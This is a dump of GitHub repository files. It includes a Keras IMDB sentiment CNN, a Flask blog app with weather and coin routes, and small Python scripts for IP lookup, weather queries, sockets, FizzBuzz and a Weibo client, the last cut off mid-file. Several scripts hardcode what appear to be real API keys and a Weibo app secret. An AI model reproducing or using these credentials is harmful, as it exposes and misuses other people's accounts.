keras.layers import Embedding\nfrom keras.layers.convolutional import Conv1D\nfrom keras.layers.convolutional import MaxPooling1D\nfrom keras.utils import to_categorical\n\nvocab_dir = 'data/vocab.txt'\nembedding_dir = 'data/glove.6B.300d.txt'\ntrain_dir = ['data/Imdb/train/neg', 'data/Imdb/train/pos']\ntest_dir = ['data/Imdb/test/neg', 'data/Imdb/test/pos']\n# The number of reviews wanna extract, use False to extract all\nnum = False\n\n# Get vocab\nvocab = load_doc(vocab_dir)\nvocab = set(vocab.split())\n\n# Prepare training data\nprint(\"Preparing training and test data\")\ntrain_docs = list()\nfor d in train_dir:\n train_docs += prepare(d, vocab, num)\ntokenizer = Tokenizer()\ntokenizer.fit_on_texts(train_docs)\nvocab_size = len(tokenizer.word_index) + 1\nencoded_docs = tokenizer.texts_to_sequences(train_docs)\nmax_length = max([len(s) for s in encoded_docs])\nXtrain = pad_sequences(encoded_docs, maxlen=max_length, padding='post')\nytrain = np.array([0 for _ in range(num if num else 12500)] + [1 for _ in range(num if num else 12500)])\nytrain = to_categorical(ytrain, num_classes=2)\n\n# Prepare test data\ntest_docs = list()\nfor d in test_dir:\n test_docs += prepare(d, vocab, num)\nencoded_docs = tokenizer.texts_to_sequences(test_docs)\nXtest = pad_sequences(encoded_docs, maxlen=max_length, padding='post')\nytest = np.array([0 for _ in 
range(num if num else 12500)] + [1 for _ in range(num if num else 12500)])\nytest = to_categorical(ytest, num_classes=2)\n\n# Using pre-trained word embedding\nprint(\"Loading Word Embedding\")\nwordlist = load_emb(embedding_dir, tokenizer.word_index)\nembedding_layer = Embedding(vocab_size, 300, weights=[wordlist], input_length=max_length, trainable=False)\n# Define model\nmodel = Sequential()\nmodel.add(embedding_layer)\nmodel.add(Conv1D(filters=128, kernel_size=5, activation='relu'))\nmodel.add(MaxPooling1D(pool_size=2))\nmodel.add(Flatten())\nmodel.add(Dense(2, activation='softmax'))\nmodel.summary()\n# Compile network\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n# Fit network\nmodel.fit(Xtrain, ytrain, epochs=20, verbose=1)\n\n# evaluate\nloss, acc = model.evaluate(Xtest, ytest, verbose=0)\nprint('Test Accuracy: %f' % (acc * 100))\n" } ]
4
ijmazur/pwpflask
https://github.com/ijmazur/pwpflask
6d6ef0120e2281581768a34cf6b94c6e80b4e3fe
6a2d212a34216714f5015eafa3a1512892e0ddd4
d8874f7b377ef92ffc78022a429ee5ac3c335758
refs/heads/main
2023-06-02T19:53:02.412854
2021-06-25T13:27:17
2021-06-25T13:27:17
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7092404365539551, "alphanum_fraction": 0.7189162969589233, "avg_line_length": 41.20408248901367, "blob_id": "e958611b4ee9f78cd86070efd273c8f01677432b", "content_id": "0e2d002e3c80beabace54b67b2eca86a7b818ada", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2067, "license_type": "no_license", "max_line_length": 110, "num_lines": 49, "path": "/flaskblog/users/utils.py", "repo_name": "ijmazur/pwpflask", "src_encoding": "UTF-8", "text": "import os\r\nimport secrets\r\nfrom PIL import Image\r\nfrom flask import url_for, current_app\r\nfrom flask_mail import Message\r\nfrom flaskblog import mail\r\n\r\n\r\n# a random hex from secrets is the base for randomising the name of the picture, so it never hurts our db\r\n# we save the file with the same extension as it's uploaded with (os - needed for that)\r\n# the filename.extension is split and we save the extension\r\n# we need to use _, as the variable is not used in our application (f_name)\r\n# we join the two in picture_fn = hexname + extension\r\n# picture_path = app root (package directory) and static/profile_pics, and we add the picture filename we created\r\n# the picture can't be bigger than 125x125\r\ndef save_picture(form_picture):\r\n random_hex = secrets.token_hex(8)\r\n _, f_ext = os.path.splitext(form_picture.filename)\r\n picture_fn = random_hex + f_ext\r\n picture_path = os.path.join(current_app.root_path, 'static/profile_pics', picture_fn)\r\n\r\n output_size = (125, 125)\r\n i = Image.open(form_picture)\r\n i.thumbnail(output_size)\r\n\r\n i.save(picture_path)\r\n # to delete previous profile pic, while adding new one\r\n # prev_picture = os.path.join(app.root_path, 'static/profile_pics', current_user.image_file)\r\n # if os.path.exists(prev_picture) and os.path.basename(prev_picture) != 'default.jpg':\r\n # os.remove(prev_picture)\r\n return picture_fn\r\n\r\n\r\n# get_reset_token (main app models.py)\r\n # 1800 = 30 minutes\r\n # into Serializer we pass in the secret_key\r\n # and we return a token created with this serializer\r\n # we dump it with payload of userid, and we use our own self.id that the user resets\r\n # and we decode it with utf-8\r\n# we send the email message from [email protected] with the reset token\r\ndef send_reset_email(user):\r\n token = user.get_reset_token()\r\n msg = Message('Password Reset Request', sender='[email protected]', recipients=[user.email])\r\n msg.body = f'''To reset your password, visit the following link:\r\n{url_for('users.reset_token', token=token, _external=True)}\r\n\r\nIf you did not make this request, then simply ignore this email and no changes will be made.\r\n'''\r\n mail.send(msg)" }, { "alpha_fraction": 0.6473520398139954, "alphanum_fraction": 0.6542056202888489, "avg_line_length": 33.1489372253418, "blob_id": "706018318fd6cd32bf0bf4016937f9337afe910d", "content_id": "58cc0a70c7cce37bef34a4773febf85bd3da4bf8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1605, "license_type": "no_license", "max_line_length": 105, "num_lines": 47, "path": "/flaskblog/weather/routes.py", "repo_name": "ijmazur/pwpflask", "src_encoding": "UTF-8", "text": "import configparser\r\nimport os\r\nimport requests\r\nfrom flask import render_template, Blueprint, request\r\n\r\nweather = Blueprint('weather', __name__)\r\n# OWM_API = os.environ.get('OWM_API')\r\n\r\n\r\n# asking what city we are looking for\r\[email protected](\"/weather\")\r\ndef weather_dashboard():\r\n return render_template('weather.html')\r\n\r\n\r\n# filtering through the JSON, getting what I need\r\[email protected](\"/weather-results\", 
methods=['POST'])\ndef get_results():\n cityname = request.form['cityname']\n api_key = get_api()\n data = what_weather(cityname, api_key)\n temp = \"{0:.2f}\".format(data[\"main\"][\"temp\"])\n feels_like = \"{0:.2f}\".format(data[\"main\"][\"feels_like\"])\n pressure = \"{0:.2f}\".format(data[\"main\"][\"pressure\"])\n humidity = \"{0:.2f}\".format(data[\"main\"][\"humidity\"])\n weathers = data[\"weather\"][0][\"main\"]\n location = data[\"name\"]\n lat = data[\"coord\"][\"lat\"]\n lon = data[\"coord\"][\"lon\"]\n country = data[\"sys\"][\"country\"]\n return render_template('weather-results.html', temp=temp, feels_like=feels_like,\n pressure=pressure, humidity=humidity, weather=weathers,\n location=location, lat=lat, lon=lon, country=country)\n\n\n# getting the API key from config.ini\ndef get_api():\n config = configparser.ConfigParser()\n config.read('flaskblog/weather/config.ini')\n return config['openweathermap']['api']\n\n\n# getting the JSON information\ndef what_weather(cityname, api_key):\n api_url = f\"http://api.openweathermap.org/data/2.5/weather?q={cityname}&units=metric&appid={api_key}\"\n r = requests.get(api_url)\n return r.json()\n" }, { "alpha_fraction": 0.531902015209198, "alphanum_fraction": 0.6598125100135803, "avg_line_length": 61.41509246826172, "blob_id": "65385b57632847234ddc1e7bd7764e820164a5c5", "content_id": "8b58f50f509f200ef9369257865f6047da58134c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3307, "license_type": "no_license", "max_line_length": 793, "num_lines": 53, "path": "/flaskblog/coins/routes.py", "repo_name": "ijmazur/pwpflask", "src_encoding": "UTF-8", "text": "from flask import render_template, request, Blueprint\nfrom flaskblog.models import Post\nimport os\nimport coinmarketcapapi\nimport json\nfrom bs4 import BeautifulSoup\nimport requests\nfrom types import SimpleNamespace\n\n#\ncoins = Blueprint('coins', __name__)\nCMP_API = os.environ.get('CMP_API')\n# cmc = coinmarketcapapi.CoinMarketCapAPI(CMP_API)\ncmc = requests.get('https://coinmarketcap.com/')\nsoup = BeautifulSoup(cmc.content, 'html.parser')\n\n#TODO use coingecko to\n# doing nothing :(\[email protected](\"/btc\")\ndef btc():\n return render_template('btc.html', title='BTC Info')\n\n\n# filtering through JSON :(\[email protected](\"/doge\")\ndef doge():\n data = '{\"DOGE\": {\"id\": 74,\"name\": \"Dogecoin\",\"symbol\": \"DOGE\",\"slug\": \"dogecoin\",\"num_market_pairs\": 376,\"date_added\": \"2013-12-15T00:00:00.000Z\",\"tags\": [\"mineable\",\"pow\",\"scrypt\",\"medium-of-exchange\",\"memes\",\"payments\"],\"max_supply\": \"None\",\"circulating_supply\": 129952951776.40607,\"total_supply\": 129952951776.40607,\"is_active\": 1,\"platform\": \"None\",\"cmc_rank\": 6,\"is_fiat\": 0,\"last_updated\": \"2021-06-09T10:23:03.000Z\",\"quote\": {\"EUR\": {\"price\": 0.2648561967893428,\"volume_24h\": 2679960884.4213257,\"percent_change_1h\": -0.91804719,\"percent_change_24h\": -2.86532626,\"percent_change_7d\": -23.78394102,\"percent_change_30d\": -38.38258941,\"percent_change_60d\": 411.89322012,\"percent_change_90d\": 487.94902906,\"market_cap\": 34418844569.04778,\"last_updated\": \"2021-06-09T10:23:17.000Z\"}}}} '\n x = json.loads(data, object_hook=lambda d: SimpleNamespace(**d))\n return render_template('doge.html', title='DOGE Info', value=x.DOGE)\n\n\n\n\n\n\"\"\"\ndata = '{\"BTC\": {\"id\": 1,\"name\": \"Bitcoin\",\"symbol\": \"BTC\",\"slug\": \"bitcoin\",\"num_market_pairs\": 9095,' \\\n '\"date_added\": 
\"2013-04-28T00:00:00.000Z\", \"tags\": [\"mineable\", \"pow\", \"sha-256\", \"store-of-value\", ' \\\n '\"state-channels\", \"coinbase-ventures-portfolio\", \"three-arrows-capital-portfolio\", ' \\\n '\"polychain-capital-portfolio\", \"binance-labs-portfolio\", \"arrington-xrp-capital\", ' \\\n '\"blockchain-capital-portfolio\", \"boostvc-portfolio\", \"cms-holdings-portfolio\", \"dcg-portfolio\", ' \\\n '\"dragonfly-capital-portfolio\", \"electric-capital-portfolio\", \"fabric-ventures-portfolio\", ' \\\n '\"framework-ventures\", \"galaxy-digital-portfolio\", \"huobi-capital\", \"alameda-research-portfolio\", ' \\\n '\"a16z-portfolio\", \"1confirmation-portfolio\", \"winklevoss-capital\", \"usv-portfolio\", ' \\\n '\"placeholder-ventures-portfolio\", \"pantera-capital-portfolio\", \"multicoin-capital-portfolio\", ' \\\n '\"paradigm-xzy-screener\"], \"max_supply\": 21000000, \"circulating_supply\": 18734943, \"total_supply\": ' \\\n '18734943, \"is_active\": 1, \"platform\": None, \"cmc_rank\": 1,\" \"is_fiat\": 0, \"last_updated\": ' \\\n '\"2021-06-14T21:06:09.000Z\", \"quote\": {\"EUR\": {\"price\": 33263.39097356716, \"volume_24h\": ' \\\n '40310312912.62971, \"percent_change_1h\": 0.99812804, \"percent_change_24h\": 2.44472236, ' \\\n '\"percent_change_7d\": 14\".80111402, \"percent_change_30d\": -16.67105913, \"percent_change_60d\": ' \\\n '-36.62361734, \"percent_change_90d\": -28.52918414, \"market_cap\": 623187733876.4954, \"last_updated\": ' \\\n '\"2021\"-06-14T21:07:18.000Z\"}}}} '\n y = json.loads(data, object_hook=lambda d: SimpleNamespace(**d))\n\"\"\"" }, { "alpha_fraction": 0.6757936477661133, "alphanum_fraction": 0.6876984238624573, "avg_line_length": 37.78461456298828, "blob_id": "5cfc0d4e692f96979e66f630fdb16c31a19c8a80", "content_id": "b2443853abfb461e8b69213814908856ba6a9dcc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2520, "license_type": "no_license", "max_line_length": 107, "num_lines": 65, "path": "/flaskblog/posts/routes.py", "repo_name": "ijmazur/pwpflask", "src_encoding": "UTF-8", "text": "from flask import render_template, url_for, flash, redirect, request, abort, Blueprint\nfrom flask_login import current_user, login_required\nfrom flaskblog import db\nfrom flaskblog.models import Post\nfrom flaskblog.posts.forms import PostForm\n\nposts = Blueprint('posts', __name__)\n\n\n# need to be logged in to create a post, if information inputted into the Form is correct we add and commit\[email protected](\"/post/new\", methods=['GET', 'POST'])\n@login_required\ndef new_post():\n form = PostForm()\n if form.validate_on_submit():\n post = Post(title=form.title.data, content=form.content.data, author=current_user)\n db.session.add(post)\n db.session.commit()\n flash('Your post has been created!', 'success')\n return redirect(url_for('main.home'))\n return render_template('create_post.html', title='New Post', form=form, legend='New Post')\n\n\n# if posts exists = id, otherwise 404, needed so we can delete and update posts\[email protected](\"/post/<int:post_id>\")\ndef post(post_id):\n post = Post.query.get_or_404(post_id)\n return render_template('post.html', title=post.title, post=post)\n\n\n# if post does not exist 404, otherwise proceed\n# if author is not the current logged in user = 403\n# otherwise, if information put into PostForm is valid, we accept the changes and flash message\[email protected](\"/post/<int:post_id>/update\", methods=['GET', 'POST'])\n@login_required\ndef update_post(post_id):\n 
post = Post.query.get_or_404(post_id)\r\n if post.author != current_user:\r\n abort(403)\r\n form = PostForm()\r\n if form.validate_on_submit():\r\n post.title = form.title.data\r\n post.content = form.content.data\r\n db.session.commit()\r\n flash('Your post has been updated!', 'success')\r\n return redirect(url_for('posts.post', post_id=post.id))\r\n elif request.method == 'GET':\r\n form.title.data = post.title\r\n form.content.data = post.content\r\n return render_template('create_post.html', title='Update Post', form=form, legend='Update Post')\r\n\r\n\r\n# if the post doesn't exist 404, otherwise proceed\r\n# if author is not the current logged in user = 403\r\n# otherwise delete post, commit the db, flash message\r\[email protected](\"/post/<int:post_id>/delete\", methods=['POST'])\r\n@login_required\r\ndef delete_post(post_id):\r\n post = Post.query.get_or_404(post_id)\r\n if post.author != current_user:\r\n abort(403)\r\n db.session.delete(post)\r\n db.session.commit()\r\n flash('Your post has been deleted', 'success')\r\n return redirect(url_for('main.home'))" }, { "alpha_fraction": 0.6550302505493164, "alphanum_fraction": 0.6583287715911865, "avg_line_length": 43.925926208496094, "blob_id": "ed47ee4ce7c7f7cec72bacdaf6c342e13543450c", "content_id": "2ca1617376b7ac8efe3636fd5305f48f93e74e4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3638, "license_type": "no_license", "max_line_length": 115, "num_lines": 81, "path": "/flaskblog/users/forms.py", "repo_name": "ijmazur/pwpflask", "src_encoding": "UTF-8", "text": "from flask_wtf import FlaskForm\r\nfrom flask_wtf.file import FileField, FileAllowed\r\nfrom wtforms import StringField, PasswordField, SubmitField, BooleanField\r\nfrom wtforms.validators import DataRequired, Length, Email, EqualTo, ValidationError\r\nfrom flask_login import current_user\r\nfrom flaskblog.models import User\r\n\r\nclass RegistrationForm(FlaskForm):\r\n # input field for type string, receiving the name of the field and a validator that data is required to make sure\r\n # it's not empty + the length of the string is between 2-20 characters\r\n username = StringField('Username',\r\n validators=[DataRequired(), Length(min=2, max=20)])\r\n\r\n # we check if it's a valid email address and we do that by importing Email from wtf.validators\r\n email = StringField('Email',\r\n validators=[DataRequired(), Email()])\r\n password = PasswordField('Password', validators=[DataRequired()])\r\n\r\n # EqualTo - checking if we input the same password above\r\n confirm_password = PasswordField('Confirm Password',\r\n validators=[DataRequired(), EqualTo('password')])\r\n submit = SubmitField('Sign Up')\r\n\r\n # checking the db to see if the username and email already exist. if they do, we raise an error\r\n def validate_username(self, username):\r\n user = User.query.filter_by(username=username.data).first()\r\n if user:\r\n raise ValidationError('That username is taken. 
Please choose a different one')\r\n\r\n def validate_email(self, email):\r\n if email.data != current_user.email:\r\n user = User.query.filter_by(email=email.data).first()\r\n if user:\r\n raise ValidationError('This email is already registered')\r\n\r\n\r\nclass RequestResetForm(FlaskForm):\r\n email = StringField('Email', validators=[DataRequired(), Email()])\r\n submit = SubmitField('Request Password Reset')\r\n\r\n def validate_email(self, email):\r\n user = User.query.filter_by(email=email.data).first()\r\n if user is None:\r\n raise ValidationError('There is no account with that email, you must register first')\r\n\r\n\r\nclass ResetPasswordForm(FlaskForm):\r\n password = PasswordField('Password', validators=[DataRequired()])\r\n confirm_password = PasswordField('Confirm Password',\r\n validators=[DataRequired(), EqualTo('password')])\r\n submit = SubmitField('Reset Password')" }, { "alpha_fraction": 0.7021276354789734, "alphanum_fraction": 0.7096032500267029, "avg_line_length": 47.98591613769531, "blob_id": "4854a955228a70ae6749b6985008145f50b979f8", "content_id": "b4d112caa9e049017bf4f52c848e5407e3266924", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3478, "license_type": "no_license", "max_line_length": 117, "num_lines": 71, "path": "/flaskblog/models.py", "repo_name": "ijmazur/pwpflask", "src_encoding": "UTF-8", "text": "from datetime import datetime\r\nfrom itsdangerous import TimedJSONWebSignatureSerializer as Serializer\r\nfrom flask import current_app\r\nfrom flaskblog import db, login_manager\r\nfrom flask_login import UserMixin\r\n\r\n\r\n@login_manager.user_loader\r\ndef load_user(user_id):\r\n return User.query.get(int(user_id))\r\n\r\n\r\n# importing from db.Model\r\n# unique ID = column(type(int), primary_key=True (unique ID for our user)\r\n# username = has to be a string of max 20, unique, and can't be nullable\r\n# same for email and password, image_file\r\n# posts attribute is = relationship to our Post model, backref = author, lazy = True\r\n# backref is similar to adding another column to the Post Column, we get the attribute of who created the post\r\n# lazy defines when sqlalchemy loads the data, True = it loads it in one go (we can get all posts created by\r\n# an individual user\r\nclass User(db.Model, UserMixin):\r\n id = db.Column(db.Integer, primary_key=True)\r\n username = db.Column(db.String(20), unique=True, nullable=False)\r\n email = db.Column(db.String(120), unique=True, nullable=False)\r\n image_file = db.Column(db.String(20), nullable=False, 
default='default.png')\r\n password = db.Column(db.String(60), nullable=False)\r\n posts = db.relationship('Post', backref='author', lazy=True)\r\n\r\n # 1800 = 30 minutes\r\n # into Serializer we pass in the secret_key\r\n # and we return a token created with this serializer\r\n # we dump it with payload of userid, and we use our own self.id that the user resets\r\n # and we decode it with utf-8\r\n def get_reset_token(self, expires_sec=1800):\r\n s = Serializer(current_app.config['SECRET_KEY'], expires_sec)\r\n return s.dumps({'user_id': self.id}).decode('utf-8')\r\n\r\n # verification of the above token, we make a Serializer object with SECRET_KEY again\r\n # it's in a try except block due to the possibility that the token might be expired or invalid\r\n # we try to get user_id by loading the token and we try to get user_id out of that (user_id comes through the payload)\r\n # if we do get user_id without throwing an exception, we return the user.\r\n # since this method does not use self, we need @staticmethod - telling python not to expect a self parameter as arg\r\n @staticmethod\r\n def verify_reset_token(token):\r\n s = Serializer(current_app.config['SECRET_KEY'])\r\n try:\r\n user_id = s.loads(token)['user_id']\r\n except:\r\n return None\r\n return User.query.get(user_id)\r\n\r\n # dunder method (magic method) - how our object is printed, whenever we print it out.\r\n def __repr__(self):\r\n return f\"User('{self.username}', '{self.email}', '{self.image_file}')\"\r\n\r\n\r\n# same as above\r\n# date_posted = DateTime and we default to datetime.utcnow (without ()) because with () it would set the default to the time right now\r\n# we want to pass the function as argument and not the date right now\r\n# we need the user who posted the post, so we get a ForeignKey id of the user who created the post\r\n# in the User model we are referencing the actual Post class\r\n# in the user.id ForeignKey we are referencing the tablename and columnname in the db\r\nclass Post(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n title = db.Column(db.String(100), nullable=False)\r\n date_posted = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)\r\n content = db.Column(db.Text, nullable=False)\r\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\r\n\r\n def __repr__(self):\r\n return f\"Post('{self.title}', '{self.date_posted}')\"\r\n" }, { "alpha_fraction": 0.737300455570221, "alphanum_fraction": 0.7387518286705017, "avg_line_length": 24.518518447875977, "blob_id": "6d3fcde20ce76006cea753628307f6378d010dc9", "content_id": "fb3b2ae040512f83aba7bc0ce930e26382f4d16f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 689, "license_type": "no_license", "max_line_length": 171, "num_lines": 27, "path": "/README.md", "repo_name": "ijmazur/pwpflask", "src_encoding": "UTF-8", "text": "# PWPFlask\nA simple web app that lets users check the weather, create/update/delete posts, update profile pictures and account information, reset passwords, and filter posts by user. \n\n## Table of contents\n[About](#about)\\\n[Technologies](#technologies)\\\n[Future plans](#future-plans)\n\n# About\nThe app is based on the OpenWeatherMap API; it allows the user to enter a location and get the current weather. \n\n# Technologies\n### Used in project:\n* Flask\n* Bootstrap 5\n* HTML\n* CSS\n\n### Future plans\nUse the CoinGecko API to mimic trading of cryptocurrency. 
\n\nUse this command to run\\\n ```python run.py```\n\n---\n**Feel free to contact me if you have any questions, ideas or concerns about project/documentation.**\n" }, { "alpha_fraction": 0.486288845539093, "alphanum_fraction": 0.6946983337402344, "avg_line_length": 16.606060981750488, "blob_id": "ae0d7cc84abe2d7ec8ee0a1d1c259a34a9ca1c97", "content_id": "4dbf5dd1255fe2162af80ce800397897a55af5e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 547, "license_type": "no_license", "max_line_length": 23, "num_lines": 33, "path": "/requirements.txt", "repo_name": "ijmazur/pwpflask", "src_encoding": "UTF-8", "text": "bcrypt==3.2.0\nbeautifulsoup4==4.9.3\nblinker==1.4\ncertifi==2020.12.5\ncffi==1.14.5\nchardet==4.0.0\nclick==7.1.2\ncoinmarketcap==5.0.3\ndnspython==2.1.0\nemail-validator==1.1.2\nfastapi==0.65.1\nFlask==1.1.2\nFlask-Bcrypt==0.7.1\nFlask-Login==0.5.0\nFlask-Mail==0.9.1\nFlask-SQLAlchemy==2.5.1\nFlask-WTF==0.14.3\ngreenlet==1.1.0\ngunicorn==20.1.0\nidna==2.10\nitsdangerous==1.1.0\nJinja2==2.11.3\nMarkupSafe==1.1.1\nPillow==8.2.0\npycparser==2.20\nrequests==2.25.1\nsix==1.16.0\nSQLAlchemy==1.4.15\nsvgwrite==1.4.1\nTree==0.2.4\nurllib3==1.26.4\nWerkzeug==1.0.1\nWTForms==2.3.3" } ]
8
handelxh/python
https://github.com/handelxh/python
28ea57e1fa5bd35e5d91148eb7cff71ce5e9680d
3183fca68b686c794cf857d04af2c2345fb9f802
fd0f1daa3a9ae9a8db894988f90767fdd9a97dde
refs/heads/master
2016-09-05T12:39:35.462516
2014-09-09T02:00:35
2014-09-09T02:00:35
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6306306123733521, "alphanum_fraction": 0.6396396160125732, "avg_line_length": 17.5, "blob_id": "14f9348af256f6c9346a2eb873e59c0f010fe25d", "content_id": "f25217a1f505b9b6d77cec995aa5093b8fca06be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 111, "license_type": "no_license", "max_line_length": 42, "num_lines": 6, "path": "/find.py", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "import re\nf=open('./sinaweibo.py')\ncontent=f.read()\nf.close()\nb=re.findall(r'http://w{3}.*com',content)\nprint b\n" }, { "alpha_fraction": 0.6658986210823059, "alphanum_fraction": 0.7096773982048035, "avg_line_length": 24.52941131591797, "blob_id": "15ed2f769d6dabce86b9f1f74ae3edd2ea6b655f", "content_id": "5c183c9db24a9977be61c529be20ea2229ce3326", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 434, "license_type": "no_license", "max_line_length": 55, "num_lines": 17, "path": "/ipsearch.py", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "import urllib2\r\nimport urllib\r\nimport pprint\r\nimport json\r\nimport chardet\r\nurl = \"http://api.map.baidu.com/location/ip\"\r\nvalues = {\"ip\": \"211.71.92.202\", \"ak\":\r\n \"9L9g136CBV2bY9lBPMZeTLVU\", \"coor\": \"bd09ll\"}\r\ndata = urllib.urlencode(values)\r\n# print data\r\ntheurl = url + \"?\" + data\r\n# print theurl\r\nresponse = urllib2.urlopen(theurl)\r\nanswer = response.read()\r\n# answer=json.loads(answer,encoding=\"gbk\")\r\n# pprint.pprint(answer)\r\nprint answer\r\n" }, { "alpha_fraction": 0.7006507515907288, "alphanum_fraction": 0.7158351540565491, "avg_line_length": 27.8125, "blob_id": "c834418b8ad7bf3143d961d24a502f7124f51b6f", "content_id": "e5ca22db38b4d4f885229f179956896f9e3eec1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 461, "license_type": "no_license", "max_line_length": 84, "num_lines": 16, "path": "/天气查询.py", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "# coding=utf-8\r\nimport urllib2\r\nimport urllib\r\nimport pprint\r\nimport json\r\nurl=\"http://api.thinkpage.cn/v2/weather\"\r\nvalues={\"city\":\"beijing\",\"language\":\"en\",\"unit\":\"c\",\"aqi\":\"city\",\"key\":\"A70ZWYTRRT\"}\r\ndata=urllib.urlencode(values)\r\n# api=\"air.json\"\r\n# api=\"all.json\"\r\napi=\"suggestion.json\"\r\ntheurl=url+\"/\"+api+\"?\"+data\r\nresponse=urllib2.urlopen(theurl)\r\nanswer=json.loads(response.read())\r\n# pprint.pprint(answer['weather'][0]['air_quality']['city'])\r\npprint.pprint(answer)\r\n" }, { "alpha_fraction": 0.5981873273849487, "alphanum_fraction": 0.6193353533744812, "avg_line_length": 19.6875, "blob_id": "62dcd0fb192758b0807452911f72568a1ae33061", "content_id": "05ad665ef8215fed20f49fbb0764bb980b5aa244", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 331, "license_type": "no_license", "max_line_length": 44, "num_lines": 16, "path": "/socket/server.py", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "import socket\ndet = ('localhost', 8003)\nsock = socket.socket()\nsock.bind(det)\nsock.listen(5)\nconnection,address = sock.accept()\nwhile True:\n buf = connection.recv(1024)\n if buf == '1':\n connection.send('welcome to server')\n elif buf == 'fuck':\n break\n else:\n connection.send('fuck off')\n\nsock.close()\n" }, { "alpha_fraction": 0.4083438813686371, "alphanum_fraction": 0.4487989842891693, "avg_line_length": 33.434783935546875, "blob_id": "286378e060a80f6c1d16798a28289679b0cfdaae", "content_id": "4b072e725fdf5c3d4139391e61d79681c485f86c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 791, "license_type": "no_license", "max_line_length": 135, "num_lines": 23, "path": "/lagou.py", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "# def check(a, dic, d):\r\n# answer = ''\r\n# if str(a) in str(d):\r\n# return 'Fizz'\r\n# for x in dic:\r\n# answer = answer + dic[x][d%x*5:]\r\n# if not answer:\r\n# return d\r\n# return answer\r\n\r\n# if __name__ == '__main__':\r\n# # a = int(raw_input('input u a: '))\r\n# # b = int(raw_input('input u b: '))\r\n# # c = int(raw_input('input u c: '))\r\n# a,b,c=3,5,7\r\n# dic = {a: 'Fizz', b: 'Buzz', c: 'Whizz'}\r\n# for x in xrange(1, 101):\r\n# print check(a, dic, x)\r\n\r\na=[str(i).find('3') > -1 and 'Fizz' or 'Fizz'[i % 3 * 4 : ] + 'Buzz'[i % 5 * 4 : ] + 'Whizz'[i % 7 * 5 : ] or i for i in range(1, 101)]\r\nprint a\r\nb=['Fizz'[(str(3)not in str(i))*4:]or 'Fizz'[i % 3 * 4 : ] + 'Buzz'[i % 5 * 4 : ] + 'Whizz'[i % 7 * 5 : ] or i for i in range(1,101)]\r\nprint b" }, { "alpha_fraction": 0.43103447556495667, "alphanum_fraction": 0.517241358757019, "avg_line_length": 14.625, "blob_id": 
"07ae2549482b83746cfa1ca733066ecd76a77a7b", "content_id": "dc5ac6fa4f37e61d3988ad59e1cc81e483b238d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 116, "license_type": "no_license", "max_line_length": 22, "num_lines": 8, "path": "/1.py", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "# a=[1,2,3,4,5,12,3,1]\n# print len(a)\n# b= set(a)\n# print b.__add__\n\nf=open(\"c:/1.txt\",'r')\nprint f.read()\nf.close()" }, { "alpha_fraction": 0.6961206793785095, "alphanum_fraction": 0.7306034564971924, "avg_line_length": 25.77777862548828, "blob_id": "76be33c762d79eeb94106aa0461d0f91af88c20b", "content_id": "29bffe775d533ebd164fbef71b0154ab8ebf492e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 464, "license_type": "no_license", "max_line_length": 71, "num_lines": 18, "path": "/win32.py", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "# coding:utf-8\r\n# import win32api\r\n# import win32con\r\n# print help(win32api)\r\n# win32api.MessageBox(win32con.NULL, 'hello', 'python', win32con.MB_OK)\r\nimport chardet\r\nimport urllib2\r\nimport re\r\n# print help(chardet)\r\n# print chardet.detect(response)['encoding']\r\nresponse=urllib2.urlopen('http://baidu.com')\r\n# print response.read()\r\nresponse=response.read()\r\n# response=str(response)\r\nprint response\r\nha=re.findall('[a-zA-Z]+://[^\\s]*/',response)\r\nprint ha[0]\r\n# print ha.group()\r\n" }, { "alpha_fraction": 0.685230016708374, "alphanum_fraction": 0.7615011930465698, "avg_line_length": 40.349998474121094, "blob_id": "abd2f463d89836f8280f9f9f925757164f1b374c", "content_id": "0a2861b31662752cb91ad56df5f1d96a13f04b40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 826, "license_type": "no_license", "max_line_length": 113, "num_lines": 20, "path": "/sinaweibo.py", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "from weibo import APIClient\r\n# import urllib2\r\nimport requests\r\nAPP_KEY = '4064761638' # app key\r\nAPP_SECRET = '37cd063f3dfa97746ead2385796f90f1' # app secret\r\n# CALLBACK_URL = 'http://www.baidu.com' # callback url\r\nCALLBACK_URL = 'http://www.baidu.com'\r\nclient = APIClient(app_key=APP_KEY, app_secret=APP_SECRET, 
